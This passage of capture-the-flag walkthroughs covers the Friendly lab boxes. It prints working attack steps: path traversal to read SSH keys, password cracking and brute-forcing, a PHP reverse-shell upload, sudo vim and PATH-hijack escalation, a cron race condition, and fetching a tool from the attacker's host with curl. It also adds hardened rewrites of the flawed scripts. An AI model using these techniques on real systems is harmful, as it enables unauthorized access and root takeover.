CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"
Running /usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);" directly gives root privileges
Then go and read the user and root flags
cat user.txt
HMV{QUICK-user}
root flag
HMV{6ff5f1b9238a96b3c3871c67a215ec80}
Friendly
Information gathering
The IP address is 192.168.70.118; use rustscan to gather port information
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.70.118
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.70.118:21
Open 192.168.70.118:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 10:02 CST
Initiating ARP Ping Scan at 10:02
Scanning 192.168.70.118 [1 port]
Completed ARP Ping Scan at 10:02, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:02
Completed Parallel DNS resolution of 1 host. at 10:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:02
Scanning 192.168.70.118 [2 ports]
Discovered open port 80/tcp on 192.168.70.118
Discovered open port 21/tcp on 192.168.70.118
Completed SYN Stealth Scan at 10:02, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.70.118
Host is up, received arp-response (0.00081s latency).
Scanned at 2025-04-22 10:02:05 CST for 0s
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:FE:88:BB (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Ports 80 and 21 are open. Port 80 is just an apache service; a directory scan turned up nothing. Anonymous ftp login shows only an index.html
[index.html is the stock Debian "Apache2 Debian Default Page: It works" (about 300 lines of default HTML and CSS); only its last line is reproduced]
<!-- --- __ --- -->
user flag
But files can be uploaded, so upload a reverse.php and visit it to trigger it
┌──(root㉿kali-plus)-[~]
└─# ftp 192.168.70.118
Connected to 192.168.70.118.
220 ProFTPD Server (friendly) [::ffff:192.168.70.118]
Name (192.168.70.118:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||13041|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> ls -al
229 Entering Extended Passive Mode (|||55672|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 4096 Mar 11 2023 .
drwxrwxrwx 2 root root 4096 Mar 11 2023 ..
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> put reverse.php
local: reverse.php remote: reverse.php
229 Entering Extended Passive Mode (|||27054|)
150 Opening BINARY mode data connection for reverse.php
100% |******************************************| 5493 13.74 MiB/s 00:00 ETA
226 Transfer complete
5493 bytes sent in 00:00 (2.56 MiB/s)
ftp> ls -al
229 Entering Extended Passive Mode (|||55029|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 4096 Apr 22 02:13 .
drwxrwxrwx 2 root root 4096 Apr 22 02:13 ..
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
-rw-r--r-- 1 ftp nogroup 5493 Apr 22 02:13 reverse.php
226 Transfer complete
Privilege escalation - root flag
After getting a shell, look for the privilege escalation point
www-data@friendly:/$ sudo -l
Matching Defaults entries for www-data on friendly:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on friendly:
(ALL : ALL) NOPASSWD: /usr/bin/vim
Escalate through vim: sudo vim -c ':!/bin/sh' gives root privileges; then read the user and root flags
cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
# cat root.txt
cat root.txt
Not yet! Find root.txt.
So this is not the real root flag; use find to look for it
# find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
# cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f
Friendly2
Information gathering
The IP address is 192.168.1.103, with ports 22 and 80 open. Port 80 is a plain page with no functionality; scan the directories
┌──(root㉿kali-plus)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://192.168.1.103/ -x.txt,.php =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.1.103/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s ===============================================================
Starting gobuster in directory enumeration mode ===============================================================
/.php (Status: 403) [Size: 278]
/tools (Status: 301) [Size: 314] [--> http://192.168.1.103/tools/]
/assets (Status: 301) [Size: 315] [--> http://192.168.1.103/assets/]
/.php (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
Progress: 904349 / 3821499 (23.66%)
[!] Keyboard interrupt detected, terminating.
Progress: 905503 / 3821499 (23.69%)
===============================================================
Finished
===============================================================
There is a tools directory. Scanning under it finds a docements directory and three html files, which seem useless; assets holds some images. Looking back at the source of the tools page reveals a hint
<!-- Redimensionar la imagen en check_if_exist.php?doc=keyboard.html -->
This allows file reading: /etc/passwd can be read with http://192.168.1.103/tools/check_if_exist.php?doc=../../../../../etc/passwd. See whether an ssh key can be read; using the user information just obtained, read the ssh private key of the gh0st user: http://192.168.1.103/tools/check_if_exist.php?doc=../../../../../home/gh0st/.ssh/id_rsa
user flag
But the private key still needs a passphrase; crack it with john
┌──(root㉿kali-plus)-[~]
└─# ssh2john tmp > hash.txt
┌──(root㉿kali-plus)-[~]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
celtic (tmp)
1g 0:00:00:01 DONE (2025-04-24 15:45) 0.5524g/s 141.4p/s 141.4c/s 141.4C/s carolina..freedom
Use the "--show" option to display all of the cracked passwords reliably Session completed.
The password is celtic. Tried to log in but it kept failing; it turned out to be an ssh key format problem. With the format fixed, entering the password connects.
gh0st@friendly2:~$ cat user.txt
ab0366431e2d8ff563cf34272e3d14bd
Privilege escalation - root flag
gh0st@friendly2:~$ sudo -l
Matching Defaults entries for gh0st on friendly2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gh0st may run the following commands on friendly2:
(ALL : ALL) SETENV: NOPASSWD: /opt/security.sh
gh0st@friendly2:~$ cd /opt
gh0st@friendly2:/opt$ ls
0-day security.sh
gh0st@friendly2:/opt$ file 0-day
0-day: directory
gh0st@friendly2:/opt$ cd 0-day
gh0st@friendly2:/opt/0-day$ ls
names.txt
gh0st@friendly2:/opt/0-day$ cat names.txt
cat: names.txt: Permission denied
gh0st@friendly2:/opt/0-day$ cd ..
gh0st@friendly2:/opt$ ls
0-day security.sh
gh0st@friendly2:/opt$ cat security.sh
#!/bin/bash
echo "Enter the string to encode:"
read string
# Validate that the string is no longer than 20 characters
if [[ ${#string} -gt 20 ]]; then
    echo "The string cannot be longer than 20 characters."
    exit 1
fi
# Validate that the string does not contain special characters
if echo "$string" | grep -q '[^[:alnum:] ]'; then
    echo "The string cannot contain special characters."
    exit 1
fi
sus1='A-Za-z'
sus2='N-ZA-Mn-za-m'
encoded_string=$(echo "$string" | tr $sus1 $sus2)
echo "Original string: $string"
echo "Encoded string: $encoded_string"
This bash script rot13-encodes the input. It calls grep without an absolute path, so changing the PATH environment variable is enough
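A hardened rewrite of security.sh, as an added example that is not the box's own file: the hole here and in laststep's system("cat /etc/shadow") earlier is the same one, a privileged program resolving commands through a PATH the caller controls, so this version pins PATH itself and exposes its steps as functions. Input is passed as an argument instead of being read from stdin.

```shell
#!/bin/bash
# Added example, not the box's own file: a hardened rewrite of /opt/security.sh.
# The original is run through sudo with SETENV and resolves `grep` and `tr`
# through the caller's PATH, so a PATH entry controlled by the invoking user
# wins. The laststep binary earlier (system("cat /etc/shadow")) has the same
# flaw. Fix: the privileged program pins PATH itself, before any lookup.
PATH=/usr/bin:/bin
export PATH

# rot13 exactly as the original does it: letters shift by 13, digits and
# spaces pass through unchanged.
rot13() {
    printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# The original script's two rules: at most 20 characters, and nothing but
# alphanumerics and spaces. Returns 0 when the input passes, 1 otherwise.
validate_input() {
    s=$1
    if [ "${#s}" -gt 20 ]; then
        return 1
    fi
    # Same grep, same pattern; with PATH pinned it can only come from
    # /usr/bin or /bin, never from a directory the caller prepended.
    if printf '%s\n' "$s" | grep -q '[^[:alnum:] ]'; then
        return 1
    fi
    return 0
}

# Validate, then encode. The input is an argument rather than a `read`
# from stdin so the function can be exercised without a terminal.
encode_string() {
    validate_input "$1" || return 1
    rot13 "$1"
}

# Demo with a constructed input.
if encode_string 'Krabby Patty'; then
    echo
else
    echo "input rejected" >&2
fi
```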
gh0st@friendly2:/opt$ cd /tmp
gh0st@friendly2:/tmp$ echo 'chmod +s /bin/bash' > grep
gh0st@friendly2:/tmp$ chmod +x grep
gh0st@friendly2:/tmp$ ls
grep systemd-private-8f30f03d74e0499ea061bbd4a882ad65-apache2.service-Zu9Zkg systemd-private-8f30f03d74e0499ea061bbd4a882ad65-systemd-logind.service-fRSdmh
gh0st@friendly2:/tmp$ where is grep
bash: where: command not found
gh0st@friendly2:/tmp$ whereis grep
grep: /usr/bin/grep /usr/share/man/man1/grep.1.gz /usr/share/info/grep.info.gz
gh0st@friendly2:/tmp$ sudo PATH=$PWD:$PATH /opt/security.sh
Enter the string to encode: 123213
The string cannot contain special characters.
gh0st@friendly2:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
gh0st@friendly2:/tmp$ bash -p
bash-5.1# cd /root
bash-5.1# ls
interfaces.sh root.txt
bash-5.1# cat root.txt
Not yet! Try to find root.txt.
Hint: ...
bash-5.1# find / -name "..." 2>/dev/null
/...
bash-5.1# cd /...
bash-5.1# ls
ebbg.txt
bash-5.1# cat ebbg.txt
It's codified, look the cipher:
98199n723q0s44s6rs39r33685q8pnoq
Hint: numbers are not codified
The hint says the digits are not encoded, so the text presumably has to be put through the script's cipher once more. Running it through ROT13 in CyberChef does the job and gives the root flag 98199a723d0f44f6ef39e33685d8cabd.
Friendly3
Information gathering
The IP address is 192.168.1.103, with ports 21, 22 and 80 open. The web page on port 80 carries a short message:
Hi, sysadmin
I want you to know that I've just uploaded the new files into the FTP Server.
See you,
juan.
This tells us there is something on FTP, i.e. port 21. Anonymous login does not work, so the next step is to try brute-forcing the FTP password; from the message just seen, the username is either sysadmin or juan.
[21][ftp] host: 192.168.1.103 login: juan password: alexis
The password is alexis. Logging in shows a lot of files, but none of them seem useful; set that aside for now and see whether the SSH password can be brute-forced too.
user flag
[22][ssh] host: 192.168.1.103 login: juan password: alexis
It is the same password.
┌──(root㉿kali-plus)-[~]
└─# ssh juan@192.168.1.103
juan@192.168.1.103's password:
Linux friendly3 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC
Debian 6.1.27-1 (2023-05-08) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
juan@friendly3:~$ ls
ftp user.txt
juan@friendly3:~$ cat user.txt
cb40b159c8086733d57280de3f97de30
Privilege escalation - root flag
juan@friendly3:/home/blue$ curl http://192.168.1.102:9999/pspy64 > pspy
-bash: pspy: Permission denied
juan@friendly3:/home/blue$ cd /tmp
juan@friendly3:/tmp$ curl http://192.168.1.102:9999/pspy64 > pspy
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3032k  100 3032k    0     0  30.4M      0 --:--:-- --:--:-- --:--:-- 30.5M
juan@friendly3:/tmp$ chmod +x pspy
juan@friendly3:/tmp$ ./pspy
2025/04/25 05:22:19 CMD: UID=0 PID=1 | /sbin/init
2025/04/25 05:23:01 CMD: UID=0 PID=1414 | /usr/sbin/CRON -f
2025/04/25 05:23:01 CMD: UID=0 PID=1416 | /bin/sh -c /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1415 | /bin/sh -c /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1417 | /bin/bash /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1418 | /bin/bash /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1419 | /bin/bash /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1420 | /bin/bash /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1421 | /bin/bash /opt/check_for_install.sh
2025/04/25 05:23:01 CMD: UID=0 PID=1422 | rm -rf /tmp/a.bash
A cron job shows up. Its script is:
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
The script first redirects the contents of 9842734723948024.bash into /tmp/a.bash, then grants the permission bits one chmod at a time instead of all at once, so for a short window the file is writable by us before root executes it; that window can be hijacked.
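As an added example of how the same "fetch, then run" job could be written without that window (this is not the machine's own /opt/check_for_install.sh, and the function names are this example's own): the downloaded script is staged in a private mktemp directory under a restrictive umask, and its owner and mode are checked immediately before execution, so nothing another local user can do in /tmp affects what root runs. The download step is left to the caller so the functions run offline.

```shell
#!/bin/bash
# Added example (not the machine's own /opt/check_for_install.sh): a hardened
# version of the same fetch-then-run pattern. The original wrote the download
# into world-writable /tmp and then added permission bits one chmod at a time,
# so another local user could rewrite /tmp/a.bash before root executed it.
# Here the script is staged inside a private mktemp directory (mode 0700)
# under umask 077, and its owner and mode are verified right before it runs.
# Function names are this example's own.

# stage_script SRC: copy SRC into a fresh private directory and print the path
# of the staged copy. No other UID can reach the copy at any point.
stage_script() {
    local src="$1" dir
    dir=$(mktemp -d) || return 1                    # mktemp -d creates mode 0700
    ( umask 077 && cp "$src" "$dir/a.bash" ) || { rm -rf "$dir"; return 1; }
    chmod 700 "$dir/a.bash" || { rm -rf "$dir"; return 1; }
    printf '%s\n' "$dir/a.bash"
}

# verify_private FILE: 0 only if FILE is a regular file owned by us with no
# group or other write bit (octal mask 022) set.
verify_private() {
    local f="$1" mode owner
    [ -f "$f" ] || return 1
    mode=$(stat -c '%a' "$f") || return 1
    owner=$(stat -c '%u' "$f") || return 1
    [ "$owner" = "$(id -u)" ] || return 1
    (( (8#$mode & 022) == 0 )) || return 1
    return 0
}

# run_staged FILE: refuse unless verify_private passes, run FILE, then remove
# the whole private directory. Returns the script's own exit status.
run_staged() {
    local f="$1" rc
    if ! verify_private "$f"; then
        echo "refusing to run $f: unsafe owner or mode" >&2
        return 1
    fi
    /bin/bash "$f"
    rc=$?
    rm -rf "$(dirname "$f")"
    return "$rc"
}

# Cron usage sketch (URL is a placeholder): download to a 0600 temp file, stage
# it, and run only the verified copy; nothing ever lands at a fixed /tmp path.
#   tmp=$(mktemp) && curl -fsS "$URL" -o "$tmp" && staged=$(stage_script "$tmp") \
#     && rm -f "$tmp" && run_staged "$staged"
```

The point of the verify step is that the check and the execution happen on a path nobody else can write to; checking a file in /tmp and then running it would still leave a time-of-check to time-of-use gap.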
for i in $(seq 10000);do echo 'cp /bin/bash /tmp/sh;chmod +s /tmp/sh' > a.bash;done
juan@friendly3:/tmp$ ls -al
total 4300
drwxrwxrwt 7 root root 4096 Apr 25 05:45 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
-rw-r--r-- 1 juan juan 38 Apr 25 05:45 a.bash
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .font-unix
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .ICE-unix
-rwxr-xr-x 1 juan juan 3104768 Apr 25 05:36 pspy
-rwsr-sr-x 1 root root 1265648 Apr 25 05:45 sh
drwx------ 3 root root 4096 Apr 25 05:35 systemd-private-c8b3760a22ef41a289c2a5be45d684a8-systemd-logind.service-JL49lM
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 25 05:35 .XIM-unix
juan@friendly3:/tmp$ ./sh -p
sh-5.2# id
uid=1001(juan) gid=1001(juan) euid=0(root) egid=0(root) groups=0(root),1001(juan)
sh-5.2# pwd
/tmp
sh-5.2# cd /root
sh-5.2# ls
interfaces.sh root.txt
sh-5.2# cat root.txt
eb9748b67f25e6bd202e5fa25f534d51